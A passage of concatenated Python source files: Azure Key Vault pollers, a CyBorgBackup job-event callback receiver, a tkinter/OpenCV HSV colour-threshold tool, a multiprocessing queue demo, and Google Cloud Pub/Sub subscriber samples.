# type: (PollingMethod) -> None
super(KeyVaultOperationPoller, self).__init__(None, None, None, NoPolling())
self._polling_method = polling_method
# pylint: disable=arguments-differ
def result(self):
# type: () -> Any
"""Returns a representation of the final resource without waiting for the operation to complete.
:returns: The deserialized resource of the long running operation
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
return self._polling_method.resource()
@distributed_trace
def wait(self, timeout=None):
# type: (Optional[int]) -> None
"""Wait on the long running operation for a number of seconds.
You can check if this call has ended with timeout with the "done()" method.
:param int timeout: Period of time to wait for the long running
operation to complete (in seconds).
:raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
"""
if not self._polling_method.finished():
self._done = threading.Event()
self._thread = threading.Thread(
target=with_current_context(self._start),
name="KeyVaultOperationPoller({})".format(uuid.uuid4()))
self._thread.daemon = True
self._thread.start()
if self._thread is None:
return
self._thread.join(timeout=timeout)
try:
# Let's handle possible None in forgiveness here
raise self._exception # type: ignore
except TypeError: # Was None
pass
class RecoverDeletedPollingMethod(PollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, interval=2):
self._command = command
self._resource = final_resource
self._polling_interval = interval
self._status = initial_status
self._finished_status = finished_status
def _update_status(self):
# type: () -> None
try:
self._command()
self._status = self._finished_status
except ResourceNotFoundError:
pass
except HttpResponseError as e:
# If we are polling on get_deleted_* and we don't have get permissions, we will get
# ResourceNotFoundError until the resource is recovered, at which point we'll get a 403.
if e.status_code == 403:
self._status = self._finished_status
else:
raise
def initialize(self, client, initial_response, deserialization_callback):
pass
def run(self):
# type: () -> None
try:
while not self.finished():
self._update_status()
time.sleep(self._polling_interval)
except Exception as e:
logger.warning(str(e))
raise
def finished(self):
# type: () -> bool
return self._status == self._finished_status
def resource(self):
# type: () -> Any
return self._resource
def status(self):
# type: () -> str
return self._status
class DeletePollingMethod(RecoverDeletedPollingMethod):
def __init__(self, command, final_resource, initial_status, finished_status, sd_disabled, interval=2):
self._sd_disabled = sd_disabled
super(DeletePollingMethod, self).__init__(
command=command,
final_resource=final_resource,
initial_status=initial_status,
finished_status=finished_status,
interval=interval
)
def finished(self):
# type: () -> bool
return self._sd_disabled or self._status == self._finished_status
|
run_callback_receiver.py | # Python
import logging
import os
import signal
import time
from functools import cmp_to_key
from uuid import UUID
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from queue import Empty as QueueEmpty
from queue import Full as QueueFull
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
# Django
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import connection as django_connection
from django.db import DatabaseError, OperationalError
from django.db.utils import InterfaceError, InternalError
from django.core.cache import cache as django_cache
# CyBorgBackup
from cyborgbackup.main.models.jobs import Job
from cyborgbackup.main.models.events import JobEvent
from cyborgbackup.main.models.catalogs import Catalog
from cyborgbackup.main.consumers import emit_channel_notification
logger = logging.getLogger('cyborgbackup.main.commands.run_callback_receiver')
class WorkerSignalHandler:
def __init__(self):
self.kill_now = False
signal.signal(signal.SIGINT, self.exit_gracefully)
signal.signal(signal.SIGTERM, self.exit_gracefully)
def exit_gracefully(self, *args, **kwargs):
self.kill_now = True
class CallbackBrokerWorker(ConsumerMixin):
MAX_RETRIES = 2
def __init__(self, connection, use_workers=True):
self.connection = connection
self.worker_queues = []
self.total_messages = 0
self.init_workers(use_workers)
def init_workers(self, use_workers=True):
def shutdown_handler(active_workers):
def _handler(signum, frame):
try:
for active_worker in active_workers:
active_worker.terminate()
signal.signal(signum, signal.SIG_DFL)
os.kill(os.getpid(), signum) # Rethrow signal, this time without catching it
except Exception:
logger.exception('Error in shutdown_handler')
return _handler
if use_workers:
django_connection.close()
django_cache.close()
for idx in range(4):
queue_actual = MPQueue(10000)
w = Process(target=self.callback_worker, args=(queue_actual, idx,))
w.start()
if settings.DEBUG:
logger.info('Started worker %s' % str(idx))
self.worker_queues.append([0, queue_actual, w])
elif settings.DEBUG:
logger.warn('Started callback receiver (no workers)')
signal.signal(signal.SIGINT, shutdown_handler([p[2] for p in self.worker_queues]))
signal.signal(signal.SIGTERM, shutdown_handler([p[2] for p in self.worker_queues]))
def get_consumers(self, Consumer, channel):
return [Consumer(queues=[Queue(settings.CALLBACK_QUEUE,
Exchange(settings.CALLBACK_QUEUE, type='direct'),
routing_key=settings.CALLBACK_QUEUE)],
accept=['json'],
callbacks=[self.process_task])]
def process_task(self, body, message):
if "uuid" in body and body['uuid']:
try:
queue = UUID(body['uuid']).int % 4
except Exception:
queue = self.total_messages % 4
else:
queue = self.total_messages % 4
self.write_queue_worker(queue, body)
self.total_messages += 1
message.ack()
def write_queue_worker(self, preferred_queue, body):
queue_order = sorted(range(4), key=cmp_to_key(lambda x, y: -1 if x == preferred_queue else 0))
write_attempt_order = []
for queue_actual in queue_order:
try:
worker_actual = self.worker_queues[queue_actual]
worker_actual[1].put(body, block=True, timeout=5)
worker_actual[0] += 1
return queue_actual
except QueueFull:
pass
except Exception:
import traceback
tb = traceback.format_exc()
logger.warn("Could not write to queue %s" % preferred_queue)
logger.warn("Detail: {}".format(tb))
write_attempt_order.append(preferred_queue)
logger.warn("Could not write payload to any queue, attempted order: {}".format(write_attempt_order))
return None
def callback_worker(self, queue_actual, idx):
signal_handler = WorkerSignalHandler()
while not signal_handler.kill_now:
try:
body = queue_actual.get(block=True, timeout=1)
except QueueEmpty:
continue
except Exception as e:
logger.error("Exception on worker thread, restarting: " + str(e))
continue
try:
event_map = {
'job_id': JobEvent,
'catalog': Catalog,
}
if not any([key in body for key in event_map]):
raise Exception('Payload does not have a job identifier')
if settings.DEBUG:
from pygments import highlight
from pygments.lexers import PythonLexer
from pygments.formatters import Terminal256Formatter
from pprint import pformat
logger.info('Body: {}'.format(
highlight(pformat(body, width=160), PythonLexer(), Terminal256Formatter(style='friendly'))
)[:1024 * 4])
def _save_event_data():
for key, cls in event_map.items():
if key in body:
cls.create_from_data(**body)
job_identifier = 'unknown job'
for key in event_map.keys():
if key in body:
job_identifier = body[key]
break
if body.get('event') == 'EOF':
try:
msg = 'Event processing is finished for Job {}, sending notifications'
logger.info(msg.format(job_identifier))
# EOF events are sent when stdout for the running task is
# closed. don't actually persist them to the database; we
# just use them to report `summary` websocket events as an
# approximation for when a job is "done"
emit_channel_notification(
'jobs-summary',
dict(group_name='jobs', job_id=job_identifier)
)
# Additionally, when we've processed all events, we should
# have all the data we need to send out success/failure
# notification templates
j = Job.objects.get(pk=job_identifier)
if hasattr(j, 'send_notification_templates'):
retries = 0
while retries < 5:
if j.finished:
state = 'succeeded' if j.status == 'successful' else 'failed'
j.send_notification_templates(state)
break
else:
# wait a few seconds to avoid a race where the
# events are persisted _before_ the UJ.status
# changes from running -> successful
retries += 1
time.sleep(1)
j = Job.objects.get(pk=job_identifier)
except Exception:
logger.exception('Worker failed to emit notifications: Job {}'.format(job_identifier))
continue
retries = 0
while retries <= self.MAX_RETRIES:
try:
_save_event_data()
break
except (OperationalError, InterfaceError, InternalError):
if retries >= self.MAX_RETRIES:
msg = 'Worker could not re-establish database connection, shutting down gracefully: Job {}'
logger.exception(msg.format(job_identifier))
os.kill(os.getppid(), signal.SIGINT)
return
delay = 60 * retries
logger.exception('Database Error Saving Job Event, retry #{i} in {delay} seconds:'.format(
i=retries + 1,
delay=delay
))
django_connection.close()
time.sleep(delay)
retries += 1
except DatabaseError:
logger.exception('Database Error Saving Job Event for Job {}'.format(job_identifier))
break
except Exception as exc:
import traceback
tb = traceback.format_exc()
logger.error('Callback Task Processor Raised Exception: %r', exc)
logger.error('Detail: {}'.format(tb))
class Command(BaseCommand):
'''
Save Job Callback receiver (see cyborgbackup.plugins.callbacks.job_event_callback)
Runs as a management command and receives job save events. It then hands
them off to worker processors (see Worker) which writes them to the database
'''
help = 'Launch the job callback receiver'
def handle(self, *arg, **options):
with Connection(settings.BROKER_URL) as conn:
try:
worker = CallbackBrokerWorker(conn)
worker.run()
except KeyboardInterrupt:
print('Terminating Callback Receiver')
|
sourcecode.py | import tkinter as tk
from PIL import Image
from PIL import ImageTk
from tkinter import filedialog
import time,cv2
import numpy as np
from subprocess import check_output
import pyautogui
from threading import Thread, Lock
once = True
img_screenshot = None
cam = cv2.VideoCapture(0)
class App:
original_image = None
hsv_image = None
# switch to make sure screenshot not taken while already pressed
taking_screenshot = False
def __init__(self, master):
self.img_path = None
frame = tk.Frame(master)
frame.grid()
root.title("Sliders")
self.hue_lbl = tk.Label(text="Hue", fg='red')
self.hue_lbl.grid(row=2)
self.low_hue = tk.Scale(master, label='Low',from_=0, to=179, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.low_hue.grid(row=3)
self.high_hue = tk.Scale(master,label='High', from_=0, to=179, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.high_hue.set(179)
self.high_hue.grid(row=4)
###########################################################################################################
self.sat_lbl = tk.Label(text="Saturation", fg='green')
self.sat_lbl.grid(row=5)
self.low_sat = tk.Scale(master, label='Low',from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.low_sat.set(100)
self.low_sat.grid(row=6)
self.high_sat = tk.Scale(master, label="High", from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.high_sat.set(255)
self.high_sat.grid(row=7)
###########################################################################################################
self.val_lbl = tk.Label(text="Value", fg='Blue')
self.val_lbl.grid(row=8)
self.low_val = tk.Scale(master, label="Low",from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.low_val.set(100)
self.low_val.grid(row=9)
self.high_val = tk.Scale(master, label="High",from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
self.high_val.set(255)
self.high_val.grid(row=10)
###########################################################################################################
# buttons
#self.reset_btn = tk.Button(text='Reset', command=self.reset_values)
#self.reset_btn.grid(row=1,column=1)
self.print_btn = tk.Button(text='Print', command=self.print_values)
self.print_btn.grid(row=2, column=1)
self.reds = tk.Button(text="Reds", fg='red', command=self.preset_r)
self.reds.grid(row=3, column=1)
self.reds = tk.Button(text="Greens", fg='green', command=self.preset_g)
self.reds.grid(row=4, column=1)
self.reds = tk.Button(text="Blues", fg='blue', command=self.preset_b)
self.reds.grid(row=5, column=1)
# Open
self.open_btn = tk.Button(text="Open", command=self.open_file)
self.open_btn.grid(row=6, column=1)
# Screenshot
self.screenshot_btn = tk.Button(text="Screenshot", command=self.screenshot_standby)
self.screenshot_btn.grid(row=7, column=1)
# print mask array
#self.print_mask_array_btn = tk.Button(text="Print Array", command=self.print_img_array)
#self.print_mask_array_btn.grid(row=9, column=1)
###########################################################################################################
# timer label
self.screenshot_timer_lbl = tk.Label(text="Timer", fg='Red')
self.screenshot_timer_lbl.grid(row=8, column=1)
########################################################################################################## Images
# images
self.hsv_img_lbl = tk.Label(text="HSV", image=None)
self.hsv_img_lbl.grid(row=0, column=0)
self.original_img_lbl = tk.Label(text='Original',image=None)
self.original_img_lbl.grid(row=0, column=1)
##########################################################################################################
def open_file(self):
global once
once = True
#img_file = filedialog.askopenfilename()
img_file = "input.jpg"
print(img_file)
# this makes sure you select a file
# otherwise program crashes if not
if img_file != '':
self.img_path = img_file
# this just makes sure the image shows up after opening it
self.low_hue.set(self.low_hue.get()+1)
self.low_hue.set(self.low_hue.get()-1)
else:
print('picked nothing')
return 0
def preset_r(self, *args):
self.low_hue.set(0)
self.high_hue.set(13)
self.low_sat.set(100)
self.high_sat.set(255)
self.low_val.set(50)
self.high_val.set(255)
def preset_g(self, *args):
self.low_hue.set(36)
self.high_hue.set(90)
self.low_sat.set(100)
self.high_sat.set(255)
self.low_val.set(50)
self.high_val.set(255)
def preset_b(self, *args):
self.low_hue.set(80)
self.high_hue.set(125)
self.low_sat.set(100)
self.high_sat.set(255)
self.low_val.set(75)
self.high_val.set(255)
def show_changes(self, *args):
global once, img_screenshot
if self.img_path == None:
return 0
# gets the values from the sliders
# low blue, green, red
low_hue = self.low_hue.get()
low_sat = self.low_sat.get()
low_val = self.low_val.get()
# gets upper values from sliders
high_hue = self.high_hue.get()
high_sat = self.high_sat.get()
high_val = self.high_val.get()
# does nothing if low values go higher than high values
if low_val > high_val or low_sat > high_sat or low_hue > high_hue:
return 0
# Sets the original image once, manipulates the copy in next iterations
if once:
# gets image from file
if self.img_path != 'screenshot':
#img_path = 'objects.png'
# loaded as BGR
s, im = cam.read()
self.original_image = im
# image resized
self.original_image = self.resize_image(self.original_image)
self.hsv_image = self.original_image.copy()
#converts image to HSV
self.hsv_image = cv2.cvtColor(self.hsv_image, cv2.COLOR_BGR2HSV)
# gets screenshot
else:
self.original_image = img_screenshot
self.hsv_image = img_screenshot.copy()
#converts image to HSV
self.hsv_image = cv2.cvtColor(self.hsv_image, cv2.COLOR_BGR2HSV)
# OpenCV represetns images in BGR order; however PIL represents
# images in RGB order, so we need to swap the channels
self.original_image = cv2.cvtColor(self.original_image, cv2.COLOR_BGR2RGB)
# convert the images to PIL format
self.original_image = Image.fromarray(self.original_image)
# convert to ImageTk format
self.original_image = ImageTk.PhotoImage(self.original_image)
# update the original image label
self.original_img_lbl.configure(image=self.original_image)
# Keeping a reference! b/ need to!
self.original_img_lbl.image = self.original_image
once = True
# sets the lower and uppper values for the mask
# define range of colors in HSV (hue up to 179, sat-255, value-255
lower_color = np.array([low_hue,low_sat,low_val])
upper_color= np.array([high_hue,high_sat,high_val])
# red - 0,255,255 (low (hue-10,100,100) high(hue+10,255,255)
# green 60,255,255
# blue -120,255,255
#creates the mask and result
mask = cv2.inRange(self.hsv_image, lower_color, upper_color)
#res = cv2.bitwise_and(img, img, mask=mask)
# converting to RGB format
#maskbgr = cv2.cvtColor(mask, cv2.COLOR_HSV2BGR)
#maskrgb = cv2.cvtColor(maskbgr, cv2.COLOR_BGR2RGB)
# converting to PIL format
mask = Image.fromarray(mask)
# convertint to ImageTk format
mask = ImageTk.PhotoImage(mask)
# setting the hsv image to tk image label
self.hsv_img_lbl.configure(image=mask)
# adding a reference to the image to Prevent python's garbage collection from deleting it
self.hsv_img_lbl.image = mask
def reset_values(self,*args):
self.low_hue.set(0)
self.low_sat.set(100)
self.low_val.set(100)
self.high_hue.set(179)
self.high_sat.set(255)
self.high_val.set(255)
def print_values(self,*args):
"""Does NOT actually save, just prints, for now"""
print("Low = [{},{},{}]".format(self.low_hue.get(), self.low_sat.get(), self.low_val.get()))
print("High= [{},{},{}]".format(self.high_hue.get(), self.high_sat.get(), self.high_val.get()))
def screenshot_standby(self,*args):
if not self.taking_screenshot:
take_screenshot_thread = Thread(target=self.take_screenshot)
take_screenshot_thread.start()
else:
return 0
def take_screenshot(self,*args):
global img_screenshot, once
# switch to stop screenshot button from snaping a shot while snapping a shot
self.taking_screenshot = True
# switch to always display the screenshot as original everytime
once = True
# makes sure method 'show_changes' takes screenshot instead of img file
self.img_path = 'screenshot'
# starts a cound down timer of 3 seconds, parallel to the for loop
screenshot_timer_thread = Thread(target=self.screenshot_timer_lbl_update)
screenshot_timer_thread.start()
for i in range(2):
for _ in range(3):
time.sleep(1)
try:
# sets the first point of screenshot
if i == 0:
x1,y1 = pyautogui.position()
# sets the second point of screenshot
else:
x2,y2 = pyautogui.position()
except Exception as e:
print("ERROR: {}".format(e))
print("{}{} {}{}\n".format(x1,y1,x2,y2))
continue
# exits if width and height are not greater than 0
if x2 - x1 < 1 or y2 - y1 < 1:
print("Retake Screenshot")
print("Width={} Height={}".format(x2 - x1, y2 - y1))
return
# screenshot taken here with the grabbed coordinates
try:
# top-leftpt, w & h
screenshoted_image = pyautogui.screenshot(region=(x1,y1,x2-x1,y2-y1))
screenshoted_image = np.array(screenshoted_image)
except Exception as e:
print(e)
print("Could not capture image")
print("...coords passed pt1({},{}) pt2({},{})".format(x1,y1,x2,y2))
return
# converts the PIL image format to opencv2 image format
img_screenshot = cv2.cvtColor(screenshoted_image, cv2.COLOR_RGB2BGR)
# printing image array, by taking another screenshot and processing, effects will now show
try:
if args[0] == 'array':
self.taking_screenshot = False
return img_screenshot
except:
pass
# resizes image if higher than 300px in width or height
img_screenshot = self.resize_image(img_screenshot)
# this just makes sure the image shows up after opening it
self.low_hue.set(self.low_hue.get()+1)
self.low_hue.set(self.low_hue.get()-1)
# switch to allow for next screenshot
self.taking_screenshot = False
def screenshot_timer_lbl_update(self,*args):
for _ in range(2):
for i in range(3):
self.screenshot_timer_lbl.config(text="{}".format(i+1))
time.sleep(1)
self.screenshot_timer_lbl.config(text="{}".format(" "))
def resize_image(self,img,*args):
# unpacks width, height
height, width,_ = img.shape
print("Original size: {} {}".format(width, height))
count_times_resized = 0
while width > 500 or height > 500:
#if width > 300 or height > 300:
# divides images WxH by half
width = width / 2
height = height /2
count_times_resized += 1
# prints x times resized to console
if count_times_resized != 0:
print("Resized {}x smaller, to: {} {}".format(count_times_resized*2,width, height))
# makes sures image is not TOO small
if width < 300 and height < 300:
width = width * 2
height = height * 2
img = cv2.resize(img,(int(width),int(height)))
return img
def print_img_array(self):
img = self.take_screenshot('array')
#converts image to HSV
img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
# gets the values from the sliders
low_hue = self.low_hue.get()
low_sat = self.low_sat.get()
low_val = self.low_val.get()
# gets upper values from sliders
high_hue = self.high_hue.get()
high_sat = self.high_sat.get()
high_val = self.high_val.get()
lower_color = np.array([low_hue,low_sat,low_val])
upper_color= np.array([high_hue,high_sat,high_val])
#creates the mask and result
mask = cv2.inRange(self.hsv_image, lower_color, upper_color)
mask = np.array(mask)
mask.view
# Instance of Tkinter
root = tk.Tk()
# New tkinter instnace of app
app = App(root)
# loops over to keep window active
root.mainloop()
|
synchronizer.py | import multiprocessing.dummy as multiprocessing
from time import sleep
import queue
import uuid
import random
input = multiprocessing.Queue()
stop_event = multiprocessing.Event()
stored_data = []
uuid_to_index = {}
def generate_data(id):
value = 1
while True:
if stop_event.is_set():
break
input.put((id, value))
value += 1
def persist_data(stored_data, uuid_to_index):
while True:
try:
data = input.get(True, 1)
guid = uuid.uuid4().hex
uuid_to_index[guid] = len(stored_data)
stored_data.append(data + (guid,))
except queue.Empty:
break
def main():
data_persister = multiprocessing.Process(target=persist_data, args=(stored_data, uuid_to_index))
data_persister.start()
generators = [0] * 8
for i in range(8):
generators[i] = multiprocessing.Process(target=generate_data, args=(i,))
generators[i].start()
sleep(4)
stop_event.set()
data_persister.join()
print('time to find data out of {} entries'.format(len(stored_data)))
i = random.randrange(len(stored_data))
print('finding index {}: {}'.format(i, stored_data[i]))
print(stored_data[uuid_to_index[stored_data[i][2]]])
print('done')
if __name__ == '__main__':
main()
|
subscriber.py | #!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_id):
"""Lists all subscriptions for a given topic."""
# [START pubsub_list_topic_subscriptions]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_id)
for subscription in publisher.list_topic_subscriptions(topic_path):
print(subscription)
# [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id):
"""Lists all subscriptions in the current project."""
# [START pubsub_list_subscriptions]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
subscriber = pubsub_v1.SubscriberClient()
project_path = subscriber.project_path(project_id)
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
for subscription in subscriber.list_subscriptions(project_path):
print(subscription.name)
# [END pubsub_list_subscriptions]
def create_subscription(project_id, topic_id, subscription_id):
"""Create a new pull subscription on the given topic."""
# [START pubsub_create_pull_subscription]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_id)
subscription_path = subscriber.subscription_path(project_id, subscription_id)
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
subscription = subscriber.create_subscription(subscription_path, topic_path)
print("Subscription created: {}".format(subscription))
# [END pubsub_create_pull_subscription]
def create_subscription_with_dead_letter_topic(
project_id, topic_id, subscription_id, dead_letter_topic_id
):
"""Create a subscription with dead letter policy."""
# [START pubsub_dead_letter_create_subscription]
from google.cloud import pubsub_v1
from google.cloud.pubsub_v1.types import DeadLetterPolicy
# TODO(developer)
# project_id = "your-project-id"
# endpoint = "https://my-test-project.appspot.com/push"
# TODO(developer): This is an existing topic that the subscription
# with dead letter policy is attached to.
# topic_id = "your-topic-id"
# TODO(developer): This is an existing subscription with a dead letter policy.
# subscription_id = "your-subscription-id"
# TODO(developer): This is an existing dead letter topic that the subscription
# with dead letter policy will forward dead letter messages to.
# dead_letter_topic_id = "your-dead-letter-topic-id"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_id)
subscription_path = subscriber.subscription_path(project_id, subscription_id)
dead_letter_topic_path = subscriber.topic_path(project_id, dead_letter_topic_id)
dead_letter_policy = DeadLetterPolicy(
dead_letter_topic=dead_letter_topic_path, max_delivery_attempts=10
)
with subscriber:
subscription = subscriber.create_subscription(
subscription_path, topic_path, dead_letter_policy=dead_letter_policy
)
print("Subscription created: {}".format(subscription.name))
print(
"It will forward dead letter messages to: {}".format(
subscription.dead_letter_policy.dead_letter_topic
)
)
print(
"After {} delivery attempts.".format(
subscription.dead_letter_policy.max_delivery_attempts
)
)
# [END pubsub_dead_letter_create_subscription]
def create_push_subscription(project_id, topic_id, subscription_id, endpoint):
"""Create a new push subscription on the given topic."""
# [START pubsub_create_push_subscription]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
# subscription_id = "your-subscription-id"
# endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_id)
subscription_path = subscriber.subscription_path(project_id, subscription_id)
push_config = pubsub_v1.types.PushConfig(push_endpoint=endpoint)
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
subscription = subscriber.create_subscription(
subscription_path, topic_path, push_config
)
print("Push subscription created: {}".format(subscription))
print("Endpoint for subscription is: {}".format(endpoint))
# [END pubsub_create_push_subscription]
def delete_subscription(project_id, subscription_id):
"""Deletes an existing Pub/Sub topic."""
# [START pubsub_delete_subscription]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
subscriber.delete_subscription(subscription_path)
print("Subscription deleted: {}".format(subscription_path))
# [END pubsub_delete_subscription]
def update_push_subscription(project_id, topic_id, subscription_id, endpoint):
"""
Updates an existing Pub/Sub subscription's push endpoint URL.
Note that certain properties of a subscription, such as
its topic, are not modifiable.
"""
# [START pubsub_update_push_configuration]
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# topic_id = "your-topic-id"
# subscription_id = "your-subscription-id"
# endpoint = "https://my-test-project.appspot.com/push"
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
push_config = pubsub_v1.types.PushConfig(push_endpoint=endpoint)
subscription = pubsub_v1.types.Subscription(
name=subscription_path, topic=topic_id, push_config=push_config
)
update_mask = {"paths": {"push_config"}}
# Wrap the subscriber in a 'with' block to automatically call close() to
# close the underlying gRPC channel when done.
with subscriber:
result = subscriber.update_subscription(subscription, update_mask)
print("Subscription updated: {}".format(subscription_path))
print("New endpoint for subscription is: {}".format(result.push_config))
# [END pubsub_update_push_configuration]
def update_subscription_with_dead_letter_policy(
project_id, topic_id, subscription_id, dead_letter_topic_id
):
"""Update a subscription's dead letter policy."""
# [START pubsub_dead_letter_update_subscription]
from google.cloud import pubsub_v1
from google.cloud.pubsub_v1.types import DeadLetterPolicy, FieldMask
# TODO(developer)
# project_id = "your-project-id"
# TODO(developer): This is an existing topic that the subscription
# with dead letter policy is attached to.
# topic_id = "your-topic-id"
# TODO(developer): This is an existing subscription with a dead letter policy.
# subscription_id = "your-subscription-id"
# TODO(developer): This is an existing dead letter topic that the subscription
# with dead letter policy will forward dead letter messages to.
# dead_letter_topic_id = "your-dead-letter-topic-id"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_id)
subscription_path = subscriber.subscription_path(project_id, subscription_id)
dead_letter_topic_path = subscriber.topic_path(project_id, dead_letter_topic_id)
subscription_before_update = subscriber.get_subscription(subscription_path)
print("Before the update: {}".format(subscription_before_update))
# Indicates which fields in the provided subscription to update.
update_mask = FieldMask(paths=["dead_letter_policy.max_delivery_attempts"])
# Construct a dead letter policy you expect to have after the update.
dead_letter_policy = DeadLetterPolicy(
dead_letter_topic=dead_letter_topic_path, max_delivery_attempts=20
)
# Construct the subscription with the dead letter policy you expect to have
# after the update. Here, values in the required fields (name, topic) help
# identify the subscription.
subscription = pubsub_v1.types.Subscription(
name=subscription_path, topic=topic_path, dead_letter_policy=dead_letter_policy,
)
with subscriber:
subscription_after_update = subscriber.update_subscription(
subscription, update_mask
)
print("After the update: {}".format(subscription_after_update))
# [END pubsub_dead_letter_update_subscription]
return subscription_after_update
def remove_dead_letter_policy(project_id, topic_id, subscription_id):
"""Remove dead letter policy from a subscription."""
# [START pubsub_dead_letter_remove]
from google.cloud import pubsub_v1
from google.cloud.pubsub_v1.types import FieldMask
# TODO(developer)
# project_id = "your-project-id"
# TODO(developer): This is an existing topic that the subscription
# with dead letter policy is attached to.
# topic_id = "your-topic-id"
# TODO(developer): This is an existing subscription with a dead letter policy.
# subscription_id = "your-subscription-id"
subscriber = pubsub_v1.SubscriberClient()
topic_path = subscriber.topic_path(project_id, topic_id)
subscription_path = subscriber.subscription_path(project_id, subscription_id)
subscription_before_update = subscriber.get_subscription(subscription_path)
print("Before removing the policy: {}".format(subscription_before_update))
# Indicates which fields in the provided subscription to update.
update_mask = FieldMask(
paths=[
"dead_letter_policy.dead_letter_topic",
"dead_letter_policy.max_delivery_attempts",
]
)
# Construct the subscription (without any dead letter policy) that you
# expect to have after the update.
subscription = pubsub_v1.types.Subscription(
name=subscription_path, topic=topic_path
)
with subscriber:
subscription_after_update = subscriber.update_subscription(
subscription, update_mask
)
print("After removing the policy: {}".format(subscription_after_update))
# [END pubsub_dead_letter_remove]
return subscription_after_update
def receive_messages(project_id, subscription_id, timeout=None):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull]
# [START pubsub_quickstart_subscriber]
from concurrent.futures import TimeoutError
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
# The `subscription_path` method creates a fully qualified identifier
# in the form `projects/{project_id}/subscriptions/{subscription_id}`
subscription_path = subscriber.subscription_path(project_id, subscription_id)
def callback(message):
print("Received message: {}".format(message))
message.ack()
streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
print("Listening for messages on {}..\n".format(subscription_path))
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
try:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
# [END pubsub_subscriber_async_pull]
# [END pubsub_quickstart_subscriber]
def receive_messages_with_custom_attributes(project_id, subscription_id, timeout=None):
"""Receives messages from a pull subscription."""
# [START pubsub_subscriber_async_pull_custom_attributes]
from concurrent.futures import TimeoutError
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
def callback(message):
print("Received message: {}".format(message.data))
if message.attributes:
print("Attributes:")
for key in message.attributes:
value = message.attributes.get(key)
print("{}: {}".format(key, value))
message.ack()
streaming_pull_future = subscriber.subscribe(subscription_path, callback=callback)
print("Listening for messages on {}..\n".format(subscription_path))
# Wrap subscriber in a 'with' block to automatically call close() when done.
with subscriber:
try:
# When `timeout` is not set, result() will block indefinitely,
# unless an exception is encountered first.
streaming_pull_future.result(timeout=timeout)
except TimeoutError:
streaming_pull_future.cancel()
# [END pubsub_subscriber_async_pull_custom_attributes]
def receive_messages_with_flow_control(project_id, subscription_id, timeout=None):
"""Receives messages from a pull subscription with flow control."""
# [START pubsub_subscriber_flow_settings]
from concurrent.futures import TimeoutError
from google.cloud import pubsub_v1
# TODO(developer)
# project_id = "your-project-id"
# subscription_id = "your-subscription-id"
# Number of seconds the subscriber should listen for messages
# timeout = 5.0
subscriber = pubsub_v1.SubscriberClient()
subscription_path = subscriber.subscription_path(project_id, subscription_id)
def callback(message):
print("Received message: {}".format(message.data))
message.ack()
# Limit the subscriber to only have ten outstanding messages at a time.
flow_control = pubsub_v1.types.FlowControl(max_messages=10)
